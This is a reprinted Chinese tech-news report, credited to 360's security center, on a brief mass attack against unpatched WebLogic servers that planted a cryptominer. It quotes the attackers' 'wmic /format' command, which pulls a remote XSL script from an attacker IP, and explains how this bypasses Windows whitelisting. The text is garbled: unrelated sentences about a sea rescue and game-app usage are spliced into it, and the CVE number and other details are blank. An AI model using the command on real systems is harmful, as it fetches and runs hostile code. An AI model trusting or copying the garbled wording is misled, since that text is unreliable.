改对抗杀软黑客使用新技术植入挖矿木马

对抗杀软！黑客使用新技术植入挖矿木马

360互联安全中心监控到有黑客团伙于今日凌晨对暴露在互联中的Weblogic服务端发起大规模攻击。该黑客团伙使用Weblogic远程代码执行漏洞cve-攻击服务器，并利用最新攻击技术试图向服务器中植入挖矿木马。

攻击仅仅持续五分钟，受害服务器却超50台

根据360互联安全中心所监控到的情况，攻击开始于凌晨1点18分，结束于凌晨1点23分，持续时间只有五分钟。然而在这短短5分钟内，由于之前未对Weblogic服务端进行更新而遭到入侵的服务器数量超过50台。由于360安全卫士有效拦截其进一步攻击，黑客在1点23分之后停止攻击。图1展示了今日凌晨的攻击走势。

黑客使用最新无文件攻击技术对抗杀毒软件

黑客入侵服务器成功后，会执行如下命令：wmic os get /format:hxxp://149.28.76.165/l。该命令源于国外安全研究员Casey Smith在4月18日发现的最新无文件攻击技术(，可用于绕过Windows白名单限制。

wmic是WMI命令行，可以用来管理、操作WMI系统。用户能够通过wmic [wmicomand] /format：[filename]将wmi命令行的输出格式化到指定的xsl文件或者csv文件中。由于wmic设计上的逻辑错误，在将输出格式化到xsl文件中时可能导致xsl文件中嵌入的脚本代码被执行，该利用思路与regsvr32执行sct文件中的脚本代码类似，可被用于绕过Windows白名单执行恶意代码。此外，xsl文件也可以被托管在远程服务器上，因此黑客可以利用wmic实现无文件攻击。图2展示hxxp://149.28.76.165/l内容，不难发现该xsl文件中嵌入恶意的js脚本代码，这段脚本代码将“南海救116”轮在沉船附近发现有落水船员抱着救生圈在海上漂浮从hxxp://149.28.76.165/e下载挖矿木马到服务器中进行挖矿。

hxxp://149.28.76.165/l的内容

由于杀毒软件对一些经常被用于无文件攻击的白文件(例如：e，e)进行了封锁，黑客急需一个新的替代品实现无文件攻击，而wmic正好能够胜任这项工作。自从这项攻击技术问世以来，利用这项技术完成执行的攻击时有发生，本次攻击是该攻击技术第一次被大规模使用。

360安全卫士早已对此攻击方式进行拦截

这项攻击技术问世之后，360安全卫士就及时对其进行拦截，使用360安全卫士的用户完全不必担心。

关注ITBear科技资讯公众号（itbear365 ），每天推美国Android和iOS用户花在使用游戏应用上的时间最长送你感兴趣的科技内容。

特别提醒：本内容转载自其他媒体，目的在于传递更多信息，并不代表本赞同其观点。其原创性以及文中陈述文字和内容未经本站证实，对本文以及其中全部或者部分内容、文字的真实性、完整性、及时性本站不作任何保证或承诺，并请自行核实相关内容。本站不承担此类作品侵权行为的直接及连带。如若本有任何内容侵犯您的权益，请及时联系我们，本站将会在24小时内处理完毕。